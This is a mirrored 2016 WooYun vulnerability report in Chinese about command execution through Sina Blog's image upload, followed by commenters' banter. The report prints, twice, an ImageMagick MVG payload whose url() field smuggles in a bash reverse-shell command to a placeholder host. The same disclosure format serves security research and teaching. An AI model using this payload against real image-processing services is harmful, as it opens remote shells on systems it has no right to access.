新浪博客命令执行

admin

140640
文章

117
评论

2017年5月1日16:12:42评论325 views字数 202阅读0分40秒阅读模式

摘要

2016-05-06：细节已通知厂商并且等待厂商处理中
2016-05-06：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-09：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(32) 关注此漏洞

缺陷编号： WooYun-2016-205540

漏洞标题：新浪博客命令执行

漏洞作者： ontheway

提交时间： 2016-05-06 08:53

公开时间： 2016-05-09 10:41

漏洞类型：命令执行

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

18人收藏

漏洞详情

披露状态：

简要描述：

新浪博客命令执行（凑个热闹）

详细说明：

新浪博客发图片的地方

选择图片

图片内容为

code 区域

push graphic-context
 viewbox 0 0 640 480
 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")'
 pop graphic-context

一步一步点到保存成功

开始上传

shell躺在了vps上

漏洞证明：

新浪博客发图片的地方

选择图片

图片内容为

code 区域

push graphic-context
 viewbox 0 0 640 480
 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")'
 pop graphic-context

一步一步点到保存成功

开始上传

shell躺在了vps上

修复方案：

google一下

版权声明：转载请注明来源 ontheway@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-05-09 10:41

厂商回复：

已有白帽子报过，故忽略，感谢支持~

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-06 09:17 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临兵斗者皆阵列前行 !)

0

擦我昨天晚上提交的,你的通过了0....

1# 回复此人
2016-05-06 09:32 | ontheway ( 路人 | Rank:4 漏洞数:7 | hehe<script>alert(/test/)</script>)

0

@Q1NG 给你加个一字并肩王哈哈哈哈哈

2# 回复此人
2016-05-06 12:00 | 小杰哥 ( 普通白帽子 | Rank:251 漏洞数:35 | 我不是 T0n9 和的大号！)

0

@ontheway @Q1NG 我提交了5个给新浪过了两个...

3# 回复此人
2016-05-06 12:25 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临兵斗者皆阵列前行 !)

0

@小杰哥同样封你一个一字并肩王 ^ - ^

4# 回复此人
2016-05-10 10:26 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

0

没看懂啊..球带

5# 回复此人

漏洞概要 关注数(32) 关注此漏洞

缺陷编号： WooYun-2016-205540

漏洞标题： 新浪博客命令执行

相关厂商： 新浪